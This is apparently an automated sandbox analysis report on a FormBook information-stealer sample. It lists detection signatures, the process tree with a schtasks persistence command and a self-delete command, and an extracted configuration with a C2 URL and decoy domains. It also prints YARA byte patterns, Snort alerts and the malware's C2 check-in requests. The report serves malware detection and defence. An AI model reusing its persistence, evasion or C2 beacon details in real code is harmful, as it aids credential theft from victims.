Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ejecutable2.exe

Overview

General Information

Sample Name:ejecutable2.exe
Analysis ID:491547
MD5:2d359d2c999ccb15bc71229bb0275bb6
SHA1:5b5a384e8147fd996ca7c1c08f041f7b1fe7927a
SHA256:5345f3e44aadb2d07feb0520bce71dd59be35a53410fcfda5c5c1bec06b176bf
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • ejecutable2.exe (PID: 2548 cmdline: 'C:\Users\user\Desktop\ejecutable2.exe' MD5: 2D359D2C999CCB15BC71229BB0275BB6)
    • schtasks.exe (PID: 2848 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • ejecutable2.exe (PID: 2528 cmdline: C:\Users\user\Desktop\ejecutable2.exe MD5: 2D359D2C999CCB15BC71229BB0275BB6)
      • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • wscript.exe (PID: 2584 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 979D74799EA6C8B8167869A68DF5204A)
          • cmd.exe (PID: 2640 cmdline: /c del 'C:\Users\user\Desktop\ejecutable2.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.wwiilive.com/u4an/"], "decoy": ["charlottesbestroofcompany.com", "gxzcgl.com", "easyprints.xyz", "hitmanautomation.com", "play-to-escape.com", "beansmagic.com", "lianxiwan.xyz", "nuhive.net", "whystake.com", "n6h65.online", "emergencyprep4cast.com", "peolinks.com", "8ls-world.com", "tezportal.net", "trych.net", "bathrobeconnection.com", "quinnwebster.top", "sagarmakhija.online", "ladiesgossiping.com", "400doultonct.com", "anitaeichler.net", "zaibuxi.info", "cateringfrenchcroissant.com", "iblispk.art", "area-arquitectos.com", "iptechcm.com", "earthnodeone.com", "yhomggsmtdynchb.store", "movingcompanybaltimoremd.com", "na6jzt.com", "solarpanelsforhome.net", "krnlfree.com", "institutosamar.com", "only-dieta.store", "shieldhero.online", "booklibrarypdfapp.icu", "solidhelp.net", "bearmarket.party", "billysboots.com", "pyuaetr.com", "pizza-mio.com", "merchantcentergroup.com", "branchwallet.com", "multicoininvestment.com", "gzruohong.com", "doomfishingtackle.com", "eryamanescortbayan.xyz", "tunetel.com", "rhccateringevents.com", "monamodda.com", "horsmon-merchandising.com", "sharkhostlive.com", "petersonmovingco.com", "forinfodunia.com", "theseattlenotary.com", "nyc-lavage.com", "tes5ci.com", "dunedinhyperlocal.com", "myntlaccount.online", "vehiclegraphicstoronto.com", "alexarts-tortenmanufaktur.info", "empresaimperfeitors.com", "oinfoproduto.com", "mdjrhyp.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.ejecutable2.exe.262ecec.3.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        4.2.ejecutable2.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.wwiilive.com/u4an/"], "decoy": ["charlottesbestroofcompany.com", "gxzcgl.com", "easyprints.xyz", "hitmanautomation.com", "play-to-escape.com", "beansmagic.com", "lianxiwan.xyz", "nuhive.net", "whystake.com", "n6h65.online", "emergencyprep4cast.com", "peolinks.com", "8ls-world.com", "tezportal.net", "trych.net", "bathrobeconnection.com", "quinnwebster.top", "sagarmakhija.online", "ladiesgossiping.com", "400doultonct.com", "anitaeichler.net", "zaibuxi.info", "cateringfrenchcroissant.com", "iblispk.art", "area-arquitectos.com", "iptechcm.com", "earthnodeone.com", "yhomggsmtdynchb.store", "movingcompanybaltimoremd.com", "na6jzt.com", "solarpanelsforhome.net", "krnlfree.com", "institutosamar.com", "only-dieta.store", "shieldhero.online", "booklibrarypdfapp.icu", "solidhelp.net", "bearmarket.party", "billysboots.com", "pyuaetr.com", "pizza-mio.com", "merchantcentergroup.com", "branchwallet.com", "multicoininvestment.com", "gzruohong.com", "doomfishingtackle.com", "eryamanescortbayan.xyz", "tunetel.com", "rhccateringevents.com", "monamodda.com", "horsmon-merchandising.com", "sharkhostlive.com", "petersonmovingco.com", "forinfodunia.com", "theseattlenotary.com", "nyc-lavage.com", "tes5ci.com", "dunedinhyperlocal.com", "myntlaccount.online", "vehiclegraphicstoronto.com", "alexarts-tortenmanufaktur.info", "empresaimperfeitors.com", "oinfoproduto.com", "mdjrhyp.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: ejecutable2.exeVirustotal: Detection: 27%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
          Source: 4.2.ejecutable2.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: ejecutable2.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: ejecutable2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdb source: ejecutable2.exe, 00000004.00000002.487685735.00000000009D0000.00000040.00000001.sdmp, wscript.exe
          Source: Binary string: wscript.pdb source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp
          Source: Binary string: wscript.pdbN source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.branchwallet.com
          Source: C:\Windows\explorer.exeDomain query: www.wwiilive.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.101.152.161 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.168.81.157 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exeDomain query: www.tunetel.com
          Source: C:\Windows\explorer.exeDomain query: www.play-to-escape.com
          Source: C:\Windows\explorer.exeDomain query: www.yhomggsmtdynchb.store
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.222 80
          Source: C:\Windows\explorer.exeDomain query: www.iptechcm.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.pizza-mio.com
          Source: C:\Windows\explorer.exeNetwork Connect: 195.77.116.8 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.77 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.wwiilive.com/u4an/
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: Joe Sandbox ViewASN Name: BEGET-ASRU BEGET-ASRU
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.tunetel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.branchwallet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.iptechcm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.pizza-mio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.wwiilive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.play-to-escape.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.yhomggsmtdynchb.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.223.115.185 3.223.115.185
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 Sep 2021 15:39:12 GMTContent-Type: text/htmlContent-Length: 808Connection: closeVary: Accept-EncodingLast-Modified: Fri, 09 Oct 2020 08:38:37 GMTETag: "328-5b138dffc24c6"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.cs
          Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.472044018.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000005.00000000.473039091.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000005.00000000.439477133.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerT
          Source: explorer.exe, 00000005.00000000.472858003.000000000447A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: ejecutable2.exe, ejecutable2.exe, 00000004.00000000.422605822.0000000001122000.00000020.00020000.sdmpString found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
          Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: unknownDNS traffic detected: queries for: www.tunetel.com
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.tunetel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.branchwallet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.iptechcm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.pizza-mio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.wwiilive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.play-to-escape.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.yhomggsmtdynchb.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
